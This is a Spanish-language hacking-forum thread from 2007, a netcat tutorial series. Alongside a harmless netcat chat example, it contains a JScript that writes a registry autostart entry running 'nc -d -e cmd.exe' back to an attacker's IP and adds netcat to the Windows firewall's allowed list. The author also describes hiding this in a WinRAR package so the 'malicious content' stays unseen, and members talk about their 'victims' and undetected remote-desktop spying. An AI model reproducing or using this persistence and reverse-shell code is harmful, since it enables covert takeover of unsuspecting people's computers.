Jugando con netcat

Iniciado por WHK, 25 Marzo 2007, 03:17 AM

0 Miembros y 2 Visitantes están viendo este tema.

EvilGoblin

ME ENCANTO! =D..

yo tambien tenia el problema con HOST NO FOUND

y antes con el router zyxel 600 para configurar la entrada del puerto y redireccionarlo a mi IP =).

pero fue resuelto con google ^^

MUCHAS GRACIAS POR COMPARTIR LA INFORMACION =D

en esta gran comunidad =D

^^ y saludos al Staff =P
Experimental Serial Lain [Linux User]

WHK

En este momento estoy haciendo las imagenes y el video de como ver el escritorio de la victima despues de haber tomado la shell con netcat usando el realvnc4 (no detectado por lo antivirus) pero no se si ponerlo acá o hacer un nuevo tema... mientras lo hago diganme ustedes como lo quieren.
Ya he hecho el video como 4 veces pero cuando voy en la mitad se corta la luz por lo del dia del combatiente aca en Chile XD. PERO POR USTEDES LO HARIA CIENMIL VECES XD

Att. Yan.
Unilola Software.

fitu

para mi deberia ir en otro post... cuando lo tengas avisa ! xD ya pude hacerlo y me funciono ya tengo mis primeras victimas .... ingeniria social sirve demasiado :P

silverhack

Me ha gustado mucho. Enhorabuena! ;)
No admitir corrección ni consejo sobre la propia obra es pedantería.

Jean de la Bruyere

WHK

#34
JUGANDO CON NETCAT
              IV



Como convertir a netcat en un chat.

Bueno... esto es lo mas facil del mundo y no requiere partirse la cabeza para poder hacerlo. Con este metodo puedes crear aplicaciones de chat propio muy caseros. (Una forma mas de utilizar netcat.)

Uno deve ponerse de servidor ejecutando lo siguiente:

nc -L -p (puerto) -vv

y la otra persona como cliente ejecutará lo siguiente:

nc (ip del servidor) (puerto)

y ambos podrán interactuar sin la necesidad de ejecutarse comandos uno al otro ni nada por el estilo...
Esto es muy muy muy basico y sencillo, ademas puedes incorporarlo a algun proyecto hecho en visual basic para crear tu propio chat con emoticones y una buena apariencia grafica.

Este articulo no es tan importante como los dos primeros pero como su titulo india "jugando con netcat" esta es una de las muchas formas de sacarle el jugo.



Ahora voy a explicar lo que pasó acá:

nc -L -p (puerto) -vv Dijimos que -L: seguiremos conectados Aunque nuestro amigo sedesconecte... asi podremos seguir en espera de otras personas o del mismo. -p: es el puerto que usamos para comunicarnos. -vv:Very Verbose. o sea que mostraremos los mensajes  que nos estan llegando.
Ahora ustedes dicen "porque no podemos ejecutar cosas como en la primera parte de jugando con netcat???" muy simple... porque omitimos el comando: -e cmd.exe el cual nos permitía escuchar y manejar lo que hacia la consola de comandos, pero tambien puedes hacerlo con otras cosas, por ejemnplo un bat que te buelque un contenido de un texto... asi solo ves los logs de algo cuando llamas a un server o enviar reportes de algo cada cierto tiempo a alguna parte o transferir mensajes en modo pgp:

@echo off
Echo enviando mensaje:
type pgp.txt
Echo.
Echo Fin. Cerrando coneccin.
exit


y luego haces un : nc -d -e reporte.bat ip puerto o nc -L -d -e reporte.bat -p 25 .

Señores!... que quiero demostrar con este mini tutorial... que el netcat sirve para muchas cosas y no tan solo para tomar una shell... el netcat es una herramienta GNU y no un troyano.

El video explicativo (si esque no entendieron) pueden bajarlo como siempre desde acá: http://512.iespana.es/nc

Att Yan.
Unilola Software.

any

Any
#35
 >:(

any

Any
#36
 >:(

WHK

Si abres el enlace directamente del archivo del video sin hacerlo desde la pagina entonces te dice que el enlace está roto... trata de pinchar el link directamente desde la pagina sin abrir ninguna mas. Yo acabo de revisarla y si se pueden bajar aún. Casi me dió un infarto al pensar que iespana también cascaba por exeso de trafico pero no es asi como el de geocities, aún hay para rato  ;D
Y otra cosa... yo antes tambien lo hacia en system32 pero no todos tienen derecho de sobreescritura sobre esa carpeta por lo cual el winrar da un error de ruta y desvela el contenido malicioso y no queremos que eso pase asi que elegí un directorio en que todos puedan tener acceso sin importar que tipo de cuentas usen : %homepat% . también antiguamente hacia las entradas de registro con archivos de extención *.js y se ejecutaban con scripts como este:

var WSHShell = WScript.CreateObject("WScript.Shell");WSHShell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\nc.exe", "C:\\WINDOWS\\system32\\nc -d -e cmd.exe ip puerto");
WSHShell.RegWrite("HKLM\\SYSTEM\\ControlSet001\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\\AuthorizedApplications\\List\\nc.exe", "C:\\WINDOWS\\system32\\nc.exe");
function Welcome()
{if (intDoIt == vbCancel) {
}
}


y de esta forma anulamos el cortafuegos de windows XP con SP2 y ademas agregamos una entrada de autoarranque al registro del sistema y a diferencia del bat... este no se ve ni si quiera el pestañazo del DOS asi que es mas silencioso. Pero el problema estaba en que si alguien usaba un compilador web como el dreamweaver u otro similar donde asociaran estos archivos, ps en ves de agregar las entradas de registro... se abria el programa dreamweaver u otro mas. por eso lo reemplazé por un bat para que todos pudieran comprender como se hacia esta entrada de registro y pudieran hechar a volar la imaginación ya que nada me hubiera costado hacer un programa en c que haga las entradas de registro y ejecutara netcat si que se vea nada pero muchos hubiern quedado sin saber como hacerlo ya que no todos saben programar y este tutorial esta hecho con la intención del que no sabe nada... pueda aprender a usar netcat de diferentes formas y no tan solo para usarlo de troyano como muchos creen.  ;)

Alfai

Muy bueno, la verdad, no sabía todo lo que se podía hacer con esta herramienta

saludos
Alfai

NewLog

Ufff, dices en algunos posts que no se ah de saber C, pero sí que se ha de controlar un poco la programación batch (era así, no? xD).

El caso, no tenia ni idea que el netcat tuviera tantas utilidades. Mr Hobbit se lo curró programándolo ^^

Mejor no crees un hilo nuevo! Aquí ya estaría bien tu nuevo tutoo ^^

Merci :)